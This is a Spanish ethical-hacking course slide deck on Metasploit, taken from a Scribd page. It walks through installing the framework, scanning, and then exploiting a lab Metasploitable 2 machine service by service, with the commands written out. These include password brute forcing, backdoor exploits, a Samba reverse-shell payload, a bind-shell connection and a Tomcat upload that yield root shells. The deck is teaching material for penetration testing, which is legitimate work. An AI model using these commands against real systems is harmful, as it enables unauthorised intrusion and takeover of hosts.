0% encontró este documento útil (0 votos)
99 vistas85 páginas

Centro Nacional de Seguridad Digital

El documento describe el marco Metasploit, una herramienta de código abierto utilizada para realizar pruebas de penetración. Explica conceptos como exploits, payloads y módulos. Luego detalla comandos básicos de Metasploit y requisitos para su instalación.
Derechos de autor
© © All Rights Reserved
Nos tomamos en serio los derechos de los contenidos. Si sospechas que se trata de tu contenido, reclámalo aquí.
Formatos disponibles
Descarga como PDF, TXT o lee en línea desde Scribd
0% encontró este documento útil (0 votos)
99 vistas85 páginas

Centro Nacional de Seguridad Digital

El documento describe el marco Metasploit, una herramienta de código abierto utilizada para realizar pruebas de penetración. Explica conceptos como exploits, payloads y módulos. Luego detalla comandos básicos de Metasploit y requisitos para su instalación.
Derechos de autor
© © All Rights Reserved
Nos tomamos en serio los derechos de los contenidos. Si sospechas que se trata de tu contenido, reclámalo aquí.
Formatos disponibles
Descarga como PDF, TXT o lee en línea desde Scribd

CENTRO NACIONAL

DE SEGURIDAD DIGITAL

1
Programa de Especialización
en Ciberseguridad y Ciberdefensa

2
Ethical Hacking

Ing. Maurice Frayssinet Delgado


mfrayssinet@[Link]
Tfl. (+51)980.997.203
3
Unidad 5. Explotación de vulnerabilidades

5.1 Concepto de Metasploit


5.2 Configuración de Metasploit
5.3 Recopilación de información con Metasploit
5.4 Ataques con Metasploit

4
5.1 Concepto de Metasploit

5
Metasploit

El marco de Metasploit es una Este marco de código abierto basado en


herramienta muy poderosa que pueden Ruby permite realizar pruebas mediante
utilizar los ciberdelincuentes y los piratas alteraciones de la línea de comandos o
informáticos éticos para investigar GUI. También se puede ampliar mediante
vulnerabilidades sistemáticas en redes y la codificación para que actúe como un
servidores. complemento que admita varios idiomas.

6
Metasploit

Metasploit es un proyecto de código Su subproyecto más conocido es


abierto para la seguridad informática, el Metasploit Framework, una herramienta
para desarrollar y ejecutar exploits contra
que proporciona información acerca
una máquina remota. Otros subproyectos
de vulnerabilidades de seguridad y
importantes son las bases de datos
ayuda en tests de penetración de opcodes (códigos de operación), un
"Pentesting" y el desarrollo de firmas archivo de shellcodes, e investigación sobre
para sistemas de detección de intrusos. seguridad.

7
Entonces…

El Metasploit es usado para realizar


pruebas de penetración o penetration
testing.

8
Historia

Se convirtió por completo a Ruby


El Proyecto Metasploit fue en 2007, y Rapid7 adquirió la
emprendido en 2003 por HD licencia en 2009, donde
Moore para su uso como una permanece como parte del
herramienta de red portátil basada repertorio de desarrollo de firmas
en Perl, con la ayuda del IDS de la compañía con sede en
desarrollador principal Matt Boston y herramientas de exploit
Miller. remoto dirigido, fuzzing, anti-
forense y evasión.

9
Usos y beneficios de Metasploit

Exploits Codificadores
Herramienta utilizada 1 4 Se utilizan para convertir
para aprovechar las código o información.
debilidades del sistema.

Payloads 2 3 Funciones auxiliares


Conjuntos de código Herramientas y comandos
malicioso. suplementarios.

10
Usos y beneficios de Metasploit

Listeners Nops
Software malicioso que se 5 8 Una instrucción para
oculta para obtener evitar que la carga útil se
acceso. bloquee.

Shellcode Código de post-


Código que está 6 7 explotación
programado para Ayuda a probar una
activarse una vez dentro penetración más
de ese objetivo. profunda una vez dentro.

11
Definiciones básicas

Exploit: Es un código escrito, su finalidad es aprovechar un error de programación y su intención es conseguir ciertos privilegios en el
1 sistema o software vulnerado. Normalmente con el uso de los exploits se busca tomar control de la máquina víctima. Un ejemplo de como
usar un exploit de Metasploit, para explotar la vulnerabilidad que utilizaba la NSA para tener acceso a los equipos.

Payload: Es la carga de un exploit la cual se encarga de realizar la parte maliciosa de la intrusión, es decir, es el código remoto que se
2 ejecutará en la máquina vulnerada, así creando una secuencia de actividades maliciosas.

0-day exploit: es un código malicioso, permite al atacante tener control total sobre un sistema vulnerable, el problema o ventaja de
3 estos exploits es que no son conocidos por los usuarios o por los fabricantes, es decir que quedan completamente expuestos a el ataque.
Normalmente existe un tiempo de corrección desde que se descubre hasta que se soluciona.

Metasploit: Este software o framework es un conjunto de herramientas con las que un pentester puede desarrollar y ejecutar exploits y
4 lanzarlos contra máquinas para comprobar la seguridad de estas.

12
Definiciones básicas

Módulos: Es un conjunto de funcionalidades que hacen que sean más sencillas de utilizar. Como podría ser un exploit o un escaneo.
5 Existen diferentes tipos de módulos.
 Auxiliary: Proporciona herramientas externas tal como escaners o sniffers.
 Exploits: Este es el más conocido, se encuentran todos los exploits.
 Payloads: Almacena los distintos códigos maliciosos a implementar con los exploits.

6 Msfpayload: Herramienta de Metasploit enfocada a generar shell codes para inyectar junto a los exploits o junto a un software.

7 Msfencode: Herramienta que se encarga de ocultar el código malicioso a los IDS, antivirus, la detección del payload, etc. Esta
herramienta es obligatoria si se quiere llegar hasta algún equipo con alguna protección.

8 Msfvenom: Es una combinación de msfpayload y msfencode, lo que hace esta herramienta es facilitar la tarea de generar una shell y
ocultarla desde una misma consola.

13
Comandos Básicos
Comando Descripción
Back Permite retroceder al anterior directorio dentro de la consola de metasploit.

Check Permite comprobar si la configuración de nuestro exploit está configurado


correctamente.
Connect Hay un pequeño módulo de netcat en metasploit que admite SSL, proxies, pivoting
y transferencia de archivos. Te permite conectarte a un host remoto como lo harías
con netcat.
Edit Permite editar el exploit en la consola de metasploit. Este lo abrirá con el editor de
texto por defecto.
Exit Sirve para salir de metasploit.
Grep Funciona de manera similar a la versión de Linux, con la diferencia de que busca
entre los módulos algo que concuerde con la cadena de texto que hemos pasado
como argumento.

14
Comandos Básicos
Comando Descripción

Help Da una descripción corta de todos los comandos de msfconsole.

Info Proporciona una información detallada del mismo, como el nombre del autor, CVE y
cualquier restricción de carga útil que el módulo pueda tener.
Irb Permite invocar una shell de ruby a través de msfconsole y así crear scripts o
exploits sobre la marcha.

Load Permite cargar un plugin de metasploit como pcap_log.

route Permite enrutar sockets a través de una sesión, así proporcionando capacidades
pivotantes básicas. Este comando es parecido al de nuetros sistemas operativos, su
ejecución sería de la siguiente manera: route [Link] [Link] «número
de la sesión víctima».

15
Comandos Básicos

Comando Descripción

Search Ayuda a buscar en toda la base de datos de metasploit.

Sessions Comando importante para controlar las sesiones obtenidas con los exploits.
 sessions -L: lista las sesiones disponibles.
 sessions -I «sesión»: interactúa con la sesión seleccionada.
Set Nos permite introducir los parámetros de configuración necesarios para el
framework.

Show Permite mostrar y listar una sección de metasploit, como los módulos auxiliares o
los propios exploits.
Use Nos sirve para seleccionar entre los módulos de metasploit.

16
Arquitectura Metasploit

17
5.2 Configuración de Metasploit

18
Cómo conseguir Metasploit

Metasploit está disponible a través de instaladores de código abierto directamente desde el sitio
web de Rapid7.
Además de la última versión de los navegadores Chrome, Firefox o Explorer, los requisitos mínimos
del sistema son:

Sistemas operativos: Hardware:


 Ubuntu Linux 14.04 o 16.04
 Procesador de 2 GHz +
LTS (recomendado).
 Mínimo 4 GB de RAM, pero se
 Windows Server 2008 o 2012 R2.
recomiendan 8 GB.
 Windows 7 SP1 +, 8.1 o 10.
 Mínimo 1 GB de espacio en disco, pero se
 Red Hat Enterprise Linux Server 5.10, 6.5,
recomiendan 50 GB.
7.1 o posterior.

19
Debido a que esta herramienta requiere que desactive
sus propias protecciones sistemáticas y habilite la
generación de código malicioso, debe ser consciente de
los riesgos potenciales involucrados.
Si es posible, mantenga esta utilidad instalada en un
sistema separado de su dispositivo personal o cualquier
computadora que contenga información potencialmente
sensible o acceso a dicha información.

20
¿Cómo utilizar Metasploit en Kali Linux?

Este ejemplo se realiza contra un servidor Windows 2008 R2 x86 virtualizado.

Una vez tengamos instalado Kali Linux en el ordenador o en una


maquina virtual abriremos una terminal.

21
¿Cómo utilizar Metasploit en Kali Linux?

Ejecutamos el siguiente comando para levantar la base de datos:

/etc/init.d/postgresql start

22
¿Cómo utilizar Metasploit en Kali Linux?
Ahora ejecutamos metasploit en nuestra terminal. msfconsole

Ya tenemos arrancado Metasploit en nuestra terminal.

23
Creación de un entorno de trabajo

Crearemos un espacio de trabajo para que nos guarde toda la información sobre el equipo de
vamos a explotar.

Para ello, debemos ejecutar el siguiente comando:


workspace -a victima1

24
5.3 Recopilación de información con Metasploit

25
Buscar al equipo víctima que vamos a explotar
en tu red
Si no sabemos la IP que tiene el equipo que queremos explotar en tu red, utilizaremos la conocida
herramienta nmap, pero en Metasploit se utiliza como db_nmap.

Tenemos que saber que rango de red estamos conectados, en este caso mi equipo tiene la IP
[Link] y por eso en el comando ponemos [Link]/24.

db_nmap -sn [Link]/24

Nos aparecerán todos


los equipos de nuestra
red.

26
Buscar al equipo víctima que vamos a explotar
en tu red

Si hubieras obtenido mas


posibles victimas, se puede
visualizar los resultados del
db_nmap con el siguiente
comando:

hosts

27
Buscar al equipo víctima que vamos a explotar
en tu red
Ahora sabiendo cual es el equipo victima, vamos a ver que vulnerabilidades le encuentra db_nmap.
db_nmap -sV -Pn --script vuln [Link]
Aparecerán las vulnerabilidades que ha detectado db_nmap y todas son interesantes para explorar.

28
Buscar al equipo víctima que vamos a explotar
en tu red
Si queremos verlo de una forma mas resumida podemos ejecutar el siguiente comando:

Nos aparecerá el resultado resumido: vulns

29
5.4 Ataques con Metasploit

30
Explotación: Escaneando el Metasploit

Como notamos, la dirección IP


de la máquina es [Link]

Comencemos a escanear con


Nmap, que es parte de Kali
Linux

nmap -sV -p- [Link]

31
Explotación de todos los puertos en diferentes
técnicas:
21-FTP
Método 1:
Inicie sesión con Anónimo como
nombre de usuario y sin
contraseña.

ftp [Link]

Si necesita más información


sobre FTP anónimo, puede
encontrarla aquí.
[Link]

32
Explotación de todos los puertos en diferentes
técnicas:

21-FTP

Método 2:
Mediante fuerza bruta usando
Hydra, pero necesita tener una
lista personalizada de nombres
de usuario y contraseñas.

hydra -L /root/Desktop/[Link] -P /root/Desktop/[Link] <Dirección IP de destino> ftp -V

33
Explotación de todos los puertos en diferentes
técnicas:
21-FTP
Tomará cada nombre de usuario y
contraseña de los archivos dados e
intentará iniciar sesión en el servicio
FTP de destino.
Una vez que haya encontrado las
credenciales, puede iniciar sesión
directamente.

Después de iniciar sesión en una


cuenta de usuario, puede obtener
acceso de root mediante la escalada
de privilegios.

34
Explotación de todos los puertos en diferentes
técnicas:
21-FTP
Método 3:
Explotación de FTP a través del
marco Metasploit.
Abra la consola de Metasploit
framework y busque vsftpd
Backdoor exploit

msfconsole

search vsftpd

35
Explotación de todos los puertos en diferentes
técnicas:
21-FTP
use exploit / unix / ftp / vsftpd_234_backdoor

show options

set RHOSTS [Link]  <dirección IP de


destino>

exploit

Ahora se tiene acceso root.

36
Explotación de todos los puertos en diferentes
técnicas:

22-SSH
Secure Shell (SSH)
Es un protocolo de red criptográfico para operar servicios de
red de forma segura a través de una red no segura.

Explotación de SSH en diferentes técnicas.

37
Explotación de todos los puertos en diferentes
técnicas:
22-SSH
Método 1:
Cómo descifrar el nombre de usuario y la contraseña con Hydra.
Hydra es una herramienta incorporada en Kali-Linux utilizada para el ataque de fuerza bruta, es un método de
prueba y error utilizado por los programas de aplicación para decodificar datos cifrados como contraseñas o
claves de estándar de cifrado de datos (DES), mediante un esfuerzo exhaustivo (utilizando la fuerza bruta) en
lugar de emplear estrategias intelectuales.
hydra -L <Usernames_List> -P <Passwords_List> <Dirección IP de destino> <Servicio>

38
Explotación de todos los puertos en diferentes
técnicas:
22-SSH
Método 2:
Marco abierto de Metasploit.
Abra el terminal y escriba estos comandos:

service postgresql start


msfconsole
search ssh_login
use auxiliary/scanner/ssh/ssh_login

Configure este auxiliar y vea lo que


requiere.

set RHOSTS <dirección IP de destino>  en este caso [Link]

39
Explotación de todos los puertos en diferentes
técnicas:
22-SSH

Establecer lista de nombres de


usuario y contraseñas predefinidas.

set USER_FILE <Ruta del archivo


de nombre de usuario>

set PASS_FILE <Ruta del archivo


de contraseña>

exploit

40
Explotación de todos los puertos en diferentes
técnicas:
22-SSH
Tomará tiempo basado en su lista
de nombres de usuario y
contraseñas y notificará con
nombre de usuario: contraseña e
inicie sesión con esas credenciales.

ssh username@targetipaddress

Tiene acceso de usuario, no puede


realizar todas las tareas, así que
intente obtener acceso de root
mediante la escalada de privilegios.

41
Explotación de todos los puertos en diferentes
técnicas:
23-TELNET
Telnet es un protocolo de red simple basado en
texto que se utiliza para acceder a computadoras
remotas a través de redes TCP / IP como Internet.
Telnet se creó y lanzó en 1969, históricamente, se
puede decir que fue la primera Internet.

telnet <dirección IP de destino> 


[Link]
De forma predeterminada, tomará el banner de
Metasploitable 2, muestra que inicie sesión con
msfadmin / msfadmin para comenzar.
Simplemente ingrese las credenciales en las que se
encuentra.
42
Explotación de todos los puertos en diferentes
técnicas:
25-SMTP

SMTP es parte de la capa de aplicación del protocolo TCP / IP.


Mediante un proceso llamado "almacenar y reenviar", SMTP
mueve su correo electrónico a través de las redes.

Trabaja en estrecha colaboración con algo llamado Agente de


transferencia de correo (MTA) para enviar su comunicación a
la computadora y la bandeja de entrada de correo electrónico
correctas.

43
Explotación de todos los puertos en diferentes
técnicas:
25-SMTP

Método 1: service postgresql start


Usando Metasploit. msfconsole -q
Inicie Metasploit ejecutando los comandos: search smtp_version

44
Explotación de todos los puertos en diferentes
técnicas:
use auxiliary/scanning/smtp/smtp_version (ó) puede escribir
25-SMTP use 0

show options

set RHOST [Link]

exploit (ó) run

45
Explotación de todos los puertos en diferentes
técnicas:
25-SMTP
SMTP significa Simple Mail Transport Protocol y es un protocolo de servidor a servidor que
mantiene una base de datos local de usuarios a los que debe enviar y recibir correos electrónicos.

SMTP tiene un conjunto de comandos. Vamos a conectarnos a nuestro objetivo con "netcat" a
través del puerto 25 e intentaremos adquirir los correos electrónicos de esta base de datos.
Abra una nueva terminal y escriba:
nc [Link] 25

46
Explotación de todos los puertos en diferentes
técnicas:
25-SMTP
Ahora que la conexión está establecida, puede verificar mediante los comandos "SMTP“.
Type: vrfy user

vrfy (este es un shell no interactivo)

Para obtener información sobre los comandos SMTP, visite:


[Link]

47
Explotación de todos los puertos en diferentes
técnicas:
25-SMTP
Método 2:
Usando smtp_enum search smtp_enum
Esto lo puede hacer Metasploit.

48
Explotación de todos los puertos en diferentes
técnicas:
25-SMTP

use auxiliary/scanner/smtp/smtp_enum

show options
set RHOST [Link]
exploit

Este método utiliza la enumeración para


encontrar esta lista de usuarios en el
servicio SMTP.
Más adelante, NetCat puede ser útil para
obtener una conexión inversa con ese
usuario.

49
Explotación de todos los puertos en diferentes
técnicas:
139 y 445 Netbios-SSN
Samba es un proyecto de código abierto que se usa ampliamente en computadoras Linux y Unix
para que puedan trabajar con servicios de archivos e impresión de Windows.
Incluso podemos usar Samba como servidor activo para manejar el inicio de sesión, la
autenticación y el control de acceso para una red de Windows.

Buscar exploit.

50
Explotación de todos los puertos en diferentes
técnicas:
139 y 445 Netbios-SSN

use exploit / multi / samba / usermap_script

51
Explotación de todos los puertos en diferentes
técnicas:
139 y 445 Netbios-SSN

Para ver las opciones del exploit.

show options
Set RHOST192.168.0.130 (dirección IP de destino)

52
Explotación de todos los puertos en diferentes
técnicas:
139 y 445 Netbios-SSN

Establecer la carga útil.

Show payloads

Set payload cmd/unix/reverse

53
Explotación de todos los puertos en diferentes
técnicas:
139 y 445 Netbios-SSN
Establecer los argumentos
necesarios para la carga útil.

Show options

Set LHOST [Link]


(Dirección IP del atacante)

Set LPORT 4444

Verifique una vez que se hayan


completado todos los argumentos
requeridos.
exploit

54
Explotación de todos los puertos en diferentes
técnicas:
1099-Java-RMI
La invocación de método remoto (RMI) es una API que permite que un objeto invoque un método en un
objeto que existe en otro espacio de direcciones, que podría estar en la misma máquina o en una máquina
remota.
Explotación de java-RMI-server
Buscar el exploit.

search java_rmi_server

55
Explotación de todos los puertos en diferentes
técnicas:
1099-Java-RMI
Elija el exploit según su rango. Por ejemplo,
"excelente" funciona mejor que "normal".

use exploit/multi/misc/java_rmi_server

show options

set RHOSTS <IP del objetivo>

exploit

Conseguimos acceso a la máquina objetivo.

56
Explotación de todos los puertos en diferentes
técnicas:
1524-BINDSHELL
Bind shell es un tipo de shell en el que la máquina de
destino abre un puerto de comunicación o un oyente
en la máquina víctima y espera una conexión
entrante. El atacante luego se conecta al oyente de la
máquina víctima que luego conduce a la ejecución
del código o comando en el servidor.

Explotación
Es un shell de root para que podamos conectarnos a
través del servicio netcat.
nc <dirección IP de destino> 1524
Ahora eres un usuario root .

57
Explotación de todos los puertos en diferentes
técnicas:
2121-ProFTPD
Antes de explotar este puerto, debe tener
credenciales de inicio de sesión para que,
como conocemos el método, lo obtenga a
través de la técnica de fuerza bruta,
podemos acceder a ProFTPd con telnet,
estamos usando aquí usuario: usuario.

telnet <Dirección IP de Taget>


<Número de puerto>

USER <nombre de usuario>


PASS <contraseña>

Es un usuario normal, pruebe Privilege


Escalation para obtener el control de root.
58
Explotación de todos los puertos en diferentes
técnicas:
3306-MYSQL
search scanner/mysql/mysql_login
Método 1:
Buscar el exploit.

use auxiliary/scanner/mysql/mysql_login

59
Explotación de todos los puertos en diferentes
técnicas:
3306-MYSQL
A veces puede existir la posibilidad
de tener una contraseña en blanco
para MySQL. Entonces podemos
explotarlo directamente.

Nota: de forma predeterminada,


muestra BLANK_PASSWORDS como
falso, establézcalo en verdadero.

set BLANK_PASSWORDS
as true

60
Explotación de todos los puertos en diferentes
técnicas:
3306-MYSQL
Método 2:
En este método, vamos a explotar
MySQL usando este comando
proporcionando el nombre de
usuario como root y la IP del
objetivo.

mysql -u root -h <IP de destino>

61
Explotación de todos los puertos en diferentes
técnicas:
3632-DISTCCD

Distcc es una herramienta para acelerar la compilación de código fuente utilizando computación
distribuida a través de una red informática. Con la configuración adecuada

distcc puede reducir drásticamente el tiempo de compilación de un proyecto

Explotación del puerto 3632 usando distcc-exec


Abra msfconsole y busque distcc_exec

search distcc_exec

show options

62
Explotación de todos los puertos en diferentes
técnicas:
3632-DISTCCD
Establecer argumentos necesarios
para explotar.

set RHOSTS <destino-ip>

exploit

Tenemos acceso a Shell.


Intenta hacer una escalada de
privilegios para privilegios
superiores.

63
Explotación de todos los puertos en diferentes
técnicas:

5432-Postgresql

Abra msfconsole y busque


postgres_payload

search postgres_payload
use exploit/linux/postgres/postgres_payload
show options
64
Explotación de todos los puertos en diferentes
técnicas:
5432-Postgresql
Establecer los argumentos
necesarios para la explotación. set RHOSTS <target-ip>

Por defecto, usará el nombre


de usuario como postgres.
exploit

65
Explotación de todos los puertos en diferentes
técnicas:
5432-Postgresql

Iniciar sesión con éxito en postgresql.

Consigamos un shell para hacer más


cosas.

66
Explotación de todos los puertos en diferentes
técnicas:
5900-VNC
Abra msfconsole y busque el
exploit vnc_login

search vnc_login

use
auxiliary/scanner/vnc/
vnc_login

67
Explotación de todos los puertos en diferentes
técnicas:
5900-VNC show options
set RHOSTS <IP de destino>
Abra msfconsole y busque el exploit vnc_login set PASS_FILE <ruta de archivo que contiene contraseñas>
run (ó) exploit

Este método se utiliza para explotar el software VNC alojado en sistemas operativos Linux o Unix o Windows
con vulnerabilidad de autenticación.

68
Explotación de todos los puertos en diferentes
técnicas:
5900-VNC

Intenta conectar vnc con esa


contraseña.

Abra Vnc Viewer en la Terminal,


escriba la dirección IP y conéctese
una ventana emergente de inicio
de sesión y le pide que proporcione
credenciales.

69
Explotación de todos los puertos en diferentes
técnicas:
5900-VNC

Luego ingrese la contraseña y haga


clic en Aceptar.

Ahora tiene acceso.

70
Explotación de todos los puertos en diferentes
técnicas:
6000-X11

El sistema de ventanas X (también conocido como X) es un sistema de ventanas para pantallas de mapa
de bits, que es común en los sistemas operativos basados ​en UNIX.

X proporciona el marco básico para un entorno basado en GUI.

El servidor X11 remoto acepta conexiones desde cualquier lugar donde se pueda obtener una conexión a
Internet.

Es responsable del acceso a las tarjetas gráficas, los dispositivos de entrada y la pantalla de visualización
en la computadora o en el dispositivo inalámbrico.

71
Explotación de todos los puertos en diferentes
técnicas:

6000-X11
Explotación del puerto 6000 usando ssh

ssh -X -l msfadmin [Link]

En el comando anterior, 'X' habilita el


reenvío de todos los puertos, al
proporcionar el nombre de usuario y la IP
del objetivo nos da el Shell.

72
Explotación de todos los puertos en diferentes
técnicas:
6667 y 6697 UnrealIRCD

UnrealIRCd es un servidor IRC de código abierto, que sirve a miles de redes desde 1999. Se ejecuta en
Linux, OS X y Windows.

UnrealIRCd es un IRCd altamente avanzado con un fuerte enfoque en la modularidad, un archivo de


configuración avanzado y altamente configurable. Las características clave incluyen SSL
UnrealIRCd es uno de los demonios de IRC más populares y con todas las funciones y se utiliza en la
mayor cantidad de servidores de IRC.

Este servidor se describe como posiblemente el que tiene más características de seguridad que cualquier
servidor IRC.

Protocolos utilizados: Internet Relay Chat


Vamos a Exploit este servidor de IRC.

73
Explotación de todos los puertos en diferentes
técnicas:

6667 y 6697 UnrealIRCD

Método 1: en el puerto 6667

search unrealircd
use exploit/unix/irc/unreal_ircd_3281_backdoor
show options
74
Explotación de todos los puertos en diferentes
técnicas:
6667 y 6697 UnrealIRCD

Establecer los argumentos necesarios


para la explotación.

set RHOSTS <destino-ip>

por defecto, el número de puerto


6667 está asignado para explotar.

run (ó) exploit

Tenemos root.

75
Explotación de todos los puertos en diferentes
técnicas:
6667 y 6697 UnrealIRCD
Método 2: en el puerto 6697
Utilice el exploit anterior y
establezca los argumentos
necesarios.

 Esta vez configura el puerto


como 6697

set RHOSTS <destino-ip>


set RPORT 6697

Y la segunda vez también


conseguimos root.

76
Explotación de todos los puertos en diferentes
técnicas:

8180-TOMCAT

Apache Tomcat es una implementación de código abierto de las tecnologías Java


Servlet, JavaServer Pages, Java Expression Language y WebSocket.

Tomcat proporciona un entorno de servidor web HTTP "Java puro" en el que se puede
ejecutar código Java.

77
Explotación de todos los puertos en diferentes
técnicas:
8180-TOMCAT
Explotación de Apache-Tomcat search tomcat_mgr_login
Se puede completar en dos pasos: set RHOSTS <destino-ip>
Abra msfconsole y busque tomcat_mgr_login

78
Explotación de todos los puertos en diferentes
técnicas:
8180-TOMCAT
show options

Exploit asignará listas de


nombres de usuario y
contraseñas predeterminadas.
Después de configurar los
argumentos para explotar,
escriba explotar (o) ejecutar.

run

79
Explotación de todos los puertos en diferentes
técnicas:
8180-TOMCAT

Toma el mismo nombre de


usuario y contraseña y dale al
siguiente exploit.

Buscar exploits del


administrador de tomcat

search tomcat_mgr_upload
use exploit/multi/http/tomcat_mgr_upload
show options

80
Explotación de todos los puertos en diferentes
técnicas:

8180-TOMCAT
Configure RHOSTS, RPORT y
HttpPassword, HttpUsername
que obtuvimos del exploit de
inicio de sesión de tomcat y
luego ejecute el exploit.

msfconsole podría asignar la carga útil adecuada para un exploit, por eso obtuvimos meterpreter.

81
Explotación de todos los puertos en diferentes
técnicas:
8787-Ruby-drb
dRuby es un sistema de objetos
distribuidos para Ruby.
Está escrito en Ruby puro y usa su
protocolo.
No se necesitan servicios
adicionales más allá de los
proporcionados por el tiempo de
ejecución de Ruby, como los
sockets TCP.

search drb_remote_codeexec

82
Explotación de todos los puertos en diferentes
técnicas:
8787-Ruby-drb
Establecer los argumentos
necesarios para explotar.

show options

set RHOSTS <destino-ip>

exploit (ó) run

Ahora, tiene acceso a la shell de


root.
Intente utilizar algunos comandos
de shell.

83
ewqrewrew
¡Muchas gracias!
wewerwer

84
CENTRO NACIONAL
DE SEGURIDAD DIGITAL

También podría gustarte